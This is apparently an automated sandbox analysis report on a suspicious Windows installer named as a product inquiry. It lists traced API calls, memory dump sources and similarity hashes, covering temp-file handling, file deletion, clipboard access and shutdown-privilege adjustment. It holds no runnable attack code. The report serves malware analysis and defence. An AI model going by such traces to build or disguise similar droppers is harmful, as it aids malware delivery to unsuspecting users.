                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                              • String ID: C:\Users\user\AppData\Local\Temp\
                              • API String ID: 3248276644-3355392842
                              • Opcode ID: fd356b8919337fe01a24efca68e850dbe45d0084ba8af47b2787d0181ceea021
                              • Instruction ID: ffa0610acded3722bed2d7d96fb1c232a132fb9d66bc0fefd21ab2e8d06464ef
                              • Opcode Fuzzy Hash: fd356b8919337fe01a24efca68e850dbe45d0084ba8af47b2787d0181ceea021
                              • Instruction Fuzzy Hash: 4EF04C25305D6556C622723A1C89AAF1A04CED3324759073FF891F12D2DB3C8A439DBE
                              APIs
                              • IsWindowVisible.USER32(?), ref: 0040506A
                              • CallWindowProcA.USER32(?,?,?,?), ref: 004050BB
                                • Part of subcall function 0040408B: SendMessageA.USER32(000103BE,00000000,00000000,00000000), ref: 0040409D
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: Window$CallMessageProcSendVisible
                              • String ID:
                              • API String ID: 3748168415-3916222277
                              • Opcode ID: 2142c290a1f943eea3cbcd359024918697fc3eca74c4b32021e9b526f4e7b2b2
                              • Instruction ID: 78b8b48c00cf9c642473ee3ff4bb8652c0e006dd03d895f02bd3b5106f733cf3
                              • Opcode Fuzzy Hash: 2142c290a1f943eea3cbcd359024918697fc3eca74c4b32021e9b526f4e7b2b2
                              • Instruction Fuzzy Hash: AA015E71200608AFDF205F11DD80A6F37A5EB84750F14443AFA41B51D1D73A8C929EAA
                              APIs
                              • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,Call,?,?,?,?,00000002,Call,?,004060CB,80000002), ref: 00405ECD
                              • RegCloseKey.ADVAPI32(?,?,004060CB,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsd31E2.tmp\System.dll), ref: 00405ED8
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: CloseQueryValue
                              • String ID: Call
                              • API String ID: 3356406503-1824292864
                              • Opcode ID: 81da800dade96896110552a5810a24f143c54bb094b4f61591ae75c107ad8ff5
                              • Instruction ID: 161d8fcf8587aa93f0d987360409ed3ef12a8a36c24b5ed9f98f318b00ae4845
                              • Opcode Fuzzy Hash: 81da800dade96896110552a5810a24f143c54bb094b4f61591ae75c107ad8ff5
                              • Instruction Fuzzy Hash: E0015A72500609EBDF228F61CD09FDB3BA8EF55364F00402AFA95A2191D778DA54DBA4
                              APIs
                              • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402DCF,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe,C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe,80000000,00000003), ref: 00405985
                              • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402DCF,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe,C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe,80000000,00000003), ref: 00405993
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: CharPrevlstrlen
                              • String ID: C:\Users\user\Desktop
                              • API String ID: 2709904686-3370423016
                              • Opcode ID: a2cb5c10c54eab45be364f275a3e0fd7f40b7dc80b72c69925d8ec85e0f8a492
                              • Instruction ID: ff79c929155de07913877b57a895d1bbe205444e8a13cf8e1c8c73a821d1827b
                              • Opcode Fuzzy Hash: a2cb5c10c54eab45be364f275a3e0fd7f40b7dc80b72c69925d8ec85e0f8a492
                              • Instruction Fuzzy Hash: CDD0C7B3409E70AEF30353149D04B9FAA58DF16710F090466F580E6191C67C4D428BFD
                              APIs
                              • GlobalAlloc.KERNEL32(00000040,?), ref: 6E13115B
                              • GlobalFree.KERNEL32(00000000), ref: 6E1311B4
                              • GlobalFree.KERNEL32(?), ref: 6E1311C7
                              • GlobalFree.KERNEL32(?), ref: 6E1311F5
                              Memory Dump Source
                              • Source File: 00000003.00000002.178277557495.000000006E131000.00000020.00000001.01000000.00000006.sdmp, Offset: 6E130000, based on PE: true
                              • Associated: 00000003.00000002.178277524359.000000006E130000.00000002.00000001.01000000.00000006.sdmpDownload File
                              • Associated: 00000003.00000002.178277587874.000000006E133000.00000002.00000001.01000000.00000006.sdmpDownload File
                              • Associated: 00000003.00000002.178277620276.000000006E135000.00000002.00000001.01000000.00000006.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6e130000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: Global$Free$Alloc
                              • String ID:
                              • API String ID: 1780285237-0
                              • Opcode ID: 4c79783cf2942d24f27336f2f6a8e4656450c42e8a5431818475486e02536306
                              • Instruction ID: fb59b78de0a0f2d56765e8b361884cdeb640ed0716d44312bc4a368c2aa64fbb
                              • Opcode Fuzzy Hash: 4c79783cf2942d24f27336f2f6a8e4656450c42e8a5431818475486e02536306
                              • Instruction Fuzzy Hash: 8B31BEB1704665AFEB20CFF8D948AEA7FF8FB06350B348515E855C2211D7358C8AEB20
                              APIs
                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AAE
                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405AC6
                              • CharNextA.USER32(00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AD7
                              • lstrlenA.KERNEL32(00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AE0
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: lstrlen$CharNextlstrcmpi
                              • String ID:
                              • API String ID: 190613189-0
                              • Opcode ID: 63752835767028d7570d3bd2c367202728d3e51619cdcd0ff30af86384407b43
                              • Instruction ID: 2b94cf21fc0d9439dbab8b822db930a3447ea2d2cb1db815078a5a090280caf9
                              • Opcode Fuzzy Hash: 63752835767028d7570d3bd2c367202728d3e51619cdcd0ff30af86384407b43
                              • Instruction Fuzzy Hash: 6DF0C231201918AFCB02DBA8CD4099FBBA8EF06350B2540B9E841F7211D674EE01AFA9
                              APIs
                              • SetErrorMode.KERNEL32 ref: 00403231
                              • GetVersion.KERNEL32 ref: 00403237
                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040326A
                              • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004032A6
                              • OleInitialize.OLE32(00000000), ref: 004032AD
                              • SHGetFileInfoA.SHELL32(00429830,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 004032C9
                              • GetCommandLineA.KERNEL32(0042EC00,NSIS Error,?,00000006,00000008,0000000A), ref: 004032DE
                              • CharNextA.USER32(00000000,00435000,00000020,00435000,00000000,?,00000006,00000008,0000000A), ref: 0040331A
                              • GetTempPathA.KERNEL32(00000400,00436400,00000000,00000020,?,00000006,00000008,0000000A), ref: 00403417
                              • GetWindowsDirectoryA.KERNEL32(00436400,000003FB,?,00000006,00000008,0000000A), ref: 00403428
                              • lstrcatA.KERNEL32(00436400,\Temp,?,00000006,00000008,0000000A), ref: 00403434
                              • GetTempPathA.KERNEL32(000003FC,00436400,00436400,\Temp,?,00000006,00000008,0000000A), ref: 00403448
                              • lstrcatA.KERNEL32(00436400,Low,?,00000006,00000008,0000000A), ref: 00403450
                              • SetEnvironmentVariableA.KERNEL32(TEMP,00436400,00436400,Low,?,00000006,00000008,0000000A), ref: 00403461
                              • SetEnvironmentVariableA.KERNEL32(TMP,00436400,?,00000006,00000008,0000000A), ref: 00403469
                              • DeleteFileA.KERNEL32(00436000,?,00000006,00000008,0000000A), ref: 0040347D
                                • Part of subcall function 00406338: GetModuleHandleA.KERNEL32(?,?,?,0040327F,0000000A), ref: 0040634A
                                • Part of subcall function 00406338: GetProcAddress.KERNEL32(00000000,?), ref: 00406365
                                • Part of subcall function 004037CE: lstrlenA.KERNEL32(0042E3A0,?,?,?,0042E3A0,00000000,00435400,00436000,0042A870,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A870,00000000,00000002,76193410), ref: 004038BE
                                • Part of subcall function 004037CE: lstrcmpiA.KERNEL32(?,.exe), ref: 004038D1
                                • Part of subcall function 004037CE: GetFileAttributesA.KERNEL32(0042E3A0), ref: 004038DC
                                • Part of subcall function 004037CE: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,00435400), ref: 00403925
                                • Part of subcall function 004037CE: RegisterClassA.USER32(0042EBA0), ref: 00403962
                                • Part of subcall function 004036F4: CloseHandle.KERNEL32(FFFFFFFF,0040352B,?,?,00000006,00000008,0000000A), ref: 004036FF
                              • OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 0040352B
                              • ExitProcess.KERNEL32 ref: 0040354C
                              • GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 00403669
                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403670
                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403688
                              • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004036A7
                              • ExitWindowsEx.USER32(00000002,80040002), ref: 004036CB
                              • ExitProcess.KERNEL32 ref: 004036EE
                                • Part of subcall function 004056BC: MessageBoxIndirectA.USER32(0040A218), ref: 00405717
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.178258020918.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.178257983215.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258055210.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258089747.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258123409.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                              • String ID: "$.tmp$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                              • API String ID: 3776617018-3048946811
                              • Opcode ID: 4a6fde25bb1e4d16b9cf10e657b6eb7b054fa26bdd218ae18c73530f95597d45
                              • Instruction ID: 947ab88924f8c3b38e2aea5cfaab7316d1dfac26a51a196f62222c0ed64aafcd
                              • Opcode Fuzzy Hash: 4a6fde25bb1e4d16b9cf10e657b6eb7b054fa26bdd218ae18c73530f95597d45
                              • Instruction Fuzzy Hash: EEC1D470604741AAD7216F759E89B2F3EACAF45706F44053FF581B61E2CB7C8A058B2E
                              APIs
                              • GetDlgItem.USER32(?,000003F9), ref: 00404A5C
                              • GetDlgItem.USER32(?,00000408), ref: 00404A67
                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404AB1
                              • LoadBitmapA.USER32(0000006E), ref: 00404AC4
                              • SetWindowLongA.USER32(?,000000FC,0040503B), ref: 00404ADD
                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404AF1
                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404B03
                              • SendMessageA.USER32(?,00001109,00000002), ref: 00404B19
                              • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404B25
                              • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404B37
                              • DeleteObject.GDI32(00000000), ref: 00404B3A
                              • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404B65
                              • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404B71
                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C06
                              • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404C31
                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C45
                              • GetWindowLongA.USER32(?,000000F0), ref: 00404C74
                              • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404C82
                              • ShowWindow.USER32(?,00000005), ref: 00404C93
                              • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404D90
                              • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404DF5
                              • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404E0A
                              • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404E2E
                              • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E4E
                              • ImageList_Destroy.COMCTL32(?), ref: 00404E63
                              • GlobalFree.KERNEL32(?), ref: 00404E73
                              • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404EEC
                              • SendMessageA.USER32(?,00001102,?,?), ref: 00404F95
                              • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404FA4
                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00404FC4
                              • ShowWindow.USER32(?,00000000), ref: 00405012
                              • GetDlgItem.USER32(?,000003FE), ref: 0040501D
                              • ShowWindow.USER32(00000000), ref: 00405024
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.178258020918.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.178257983215.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258055210.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258089747.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258123409.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                              • String ID: $M$N
                              • API String ID: 1638840714-813528018
                              • Opcode ID: 9b14bfcce48d0d769f086a49a0ef55ef456572940aa0dac0a86a005e500a94a8
                              • Instruction ID: 8b31743f23cd8b0b58ed2b5f291beccc42c2d4f26c41c681c3135c74bfbc6718
                              • Opcode Fuzzy Hash: 9b14bfcce48d0d769f086a49a0ef55ef456572940aa0dac0a86a005e500a94a8
                              • Instruction Fuzzy Hash: 9D027FB0A00209AFEB20DF55DD85AAE7BB5FB84314F14413AF610B62E1C7799D52CF58
                              APIs
                              • DeleteFileA.KERNEL32(?,?,76193410,00436400,00000000), ref: 00405791
                              • lstrcatA.KERNEL32(0042B878,\*.*,0042B878,?,?,76193410,00436400,00000000), ref: 004057D9
                              • lstrcatA.KERNEL32(?,0040A014,?,0042B878,?,?,76193410,00436400,00000000), ref: 004057FA
                              • lstrlenA.KERNEL32(?,?,0040A014,?,0042B878,?,?,76193410,00436400,00000000), ref: 00405800
                              • FindFirstFileA.KERNEL32(0042B878,?,?,?,0040A014,?,0042B878,?,?,76193410,00436400,00000000), ref: 00405811
                              • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004058BE
                              • FindClose.KERNEL32(00000000), ref: 004058CF
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.178258020918.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.178257983215.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258055210.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258089747.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258123409.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 2035342205-1173974218
                              • Opcode ID: f32b864989338f25708692fe16fa07ece67d324431ed473f1cfad528f6b064ac
                              • Instruction ID: 3130a24326b3cf8508e32ba03364d00ecd767046abd4d032e56f6a736b511150
                              • Opcode Fuzzy Hash: f32b864989338f25708692fe16fa07ece67d324431ed473f1cfad528f6b064ac
                              • Instruction Fuzzy Hash: AD519131900A05EAEF217B618C85BAF7A78DF42314F14817FF841B61E2D73C4952EE69
                              APIs
                              • GetDlgItem.USER32(?,00000403), ref: 00405264
                              • GetDlgItem.USER32(?,000003EE), ref: 00405273
                              • GetClientRect.USER32(?,?), ref: 004052B0
                              • GetSystemMetrics.USER32(00000002), ref: 004052B7
                              • SendMessageA.USER32(?,0000101B,00000000,?), ref: 004052D8
                              • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004052E9
                              • SendMessageA.USER32(?,00001001,00000000,?), ref: 004052FC
                              • SendMessageA.USER32(?,00001026,00000000,?), ref: 0040530A
                              • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040531D
                              • ShowWindow.USER32(00000000,?,0000001B,?), ref: 0040533F
                              • ShowWindow.USER32(?,00000008), ref: 00405353
                              • GetDlgItem.USER32(?,000003EC), ref: 00405374
                              • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405384
                              • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040539D
                              • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004053A9
                              • GetDlgItem.USER32(?,000003F8), ref: 00405282
                                • Part of subcall function 00404074: SendMessageA.USER32(00000028,?,00000001,00403EA4), ref: 00404082
                              • GetDlgItem.USER32(?,000003EC), ref: 004053C5
                              • CreateThread.KERNEL32(00000000,00000000,Function_00005199,00000000), ref: 004053D3
                              • CloseHandle.KERNEL32(00000000), ref: 004053DA
                              • ShowWindow.USER32(00000000), ref: 004053FD
                              • ShowWindow.USER32(?,00000008), ref: 00405404
                              • ShowWindow.USER32(00000008), ref: 0040544A
                              • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040547E
                              • CreatePopupMenu.USER32 ref: 0040548F
                              • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004054A4
                              • GetWindowRect.USER32(?,000000FF), ref: 004054C4
                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004054DD
                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405519
                              • OpenClipboard.USER32(00000000), ref: 00405529
                              • EmptyClipboard.USER32 ref: 0040552F
                              • GlobalAlloc.KERNEL32(00000042,?), ref: 00405538
                              • GlobalLock.KERNEL32(00000000), ref: 00405542
                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405556
                              • GlobalUnlock.KERNEL32(00000000), ref: 0040556F
                              • SetClipboardData.USER32(00000001,00000000), ref: 0040557A
                              • CloseClipboard.USER32 ref: 00405580
                              Memory Dump Source
                              • Source File: 00000005.00000002.178258020918.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.178257983215.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258055210.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258089747.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258123409.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                              • String ID:
                              • API String ID: 590372296-0
                              • Opcode ID: e4850145c29fa6a118fc99cbce2f78c5114ccbb4892c913cd041fdaee94a6f36
                              • Instruction ID: f54484deaadc53d59d965fa3ad24bc50442bab3dbb2bc57f5e3c058b1bd1a4dd
                              • Opcode Fuzzy Hash: e4850145c29fa6a118fc99cbce2f78c5114ccbb4892c913cd041fdaee94a6f36
                              • Instruction Fuzzy Hash: 10A14871900608BFDB11AF61DE89AAF7F79FB08354F40403AFA41B61A0C7754E519F68
                              APIs
                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403BA7
                              • ShowWindow.USER32(?), ref: 00403BC4
                              • DestroyWindow.USER32 ref: 00403BD8
                              • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BF4
                              • GetDlgItem.USER32(?,?), ref: 00403C15
                              • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403C29
                              • IsWindowEnabled.USER32(00000000), ref: 00403C30
                              • GetDlgItem.USER32(?,00000001), ref: 00403CDE
                              • GetDlgItem.USER32(?,00000002), ref: 00403CE8
                              • SetClassLongA.USER32(?,000000F2,?), ref: 00403D02
                              • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D53
                              • GetDlgItem.USER32(?,00000003), ref: 00403DF9
                              • ShowWindow.USER32(00000000,?), ref: 00403E1A
                              • EnableWindow.USER32(?,?), ref: 00403E2C
                              • EnableWindow.USER32(?,?), ref: 00403E47
                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E5D
                              • EnableMenuItem.USER32(00000000), ref: 00403E64
                              • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E7C
                              • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E8F
                              • lstrlenA.KERNEL32(0042A870,?,0042A870,00000000), ref: 00403EB9
                              • SetWindowTextA.USER32(?,0042A870), ref: 00403EC8
                              • ShowWindow.USER32(?,0000000A), ref: 00403FFC
                              Memory Dump Source
                              • Source File: 00000005.00000002.178258020918.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.178257983215.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258055210.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258089747.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258123409.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                              • String ID:
                              • API String ID: 184305955-0
                              • Opcode ID: f28a66a0d7b9129856a2e3a49e044433d573e82c372ccead841a979cc75b8fa5
                              • Instruction ID: 5f88be39a50f3dd075596c1c1d09af532afca629c850b085fe9e60943a8810da
                              • Opcode Fuzzy Hash: f28a66a0d7b9129856a2e3a49e044433d573e82c372ccead841a979cc75b8fa5
                              • Instruction Fuzzy Hash: B7C19171604605ABEB206F62DE45E2B3FBCEB4570AF40053EF642B11E1CB799942DB1D
                              APIs
                                • Part of subcall function 00406338: GetModuleHandleA.KERNEL32(?,?,?,0040327F,0000000A), ref: 0040634A
                                • Part of subcall function 00406338: GetProcAddress.KERNEL32(00000000,?), ref: 00406365
                              • lstrcatA.KERNEL32(00436000,0042A870,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A870,00000000,00000002,76193410,00436400,00435000,00000000), ref: 00403849
                              • lstrlenA.KERNEL32(0042E3A0,?,?,?,0042E3A0,00000000,00435400,00436000,0042A870,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A870,00000000,00000002,76193410), ref: 004038BE
                              • lstrcmpiA.KERNEL32(?,.exe), ref: 004038D1
                              • GetFileAttributesA.KERNEL32(0042E3A0), ref: 004038DC
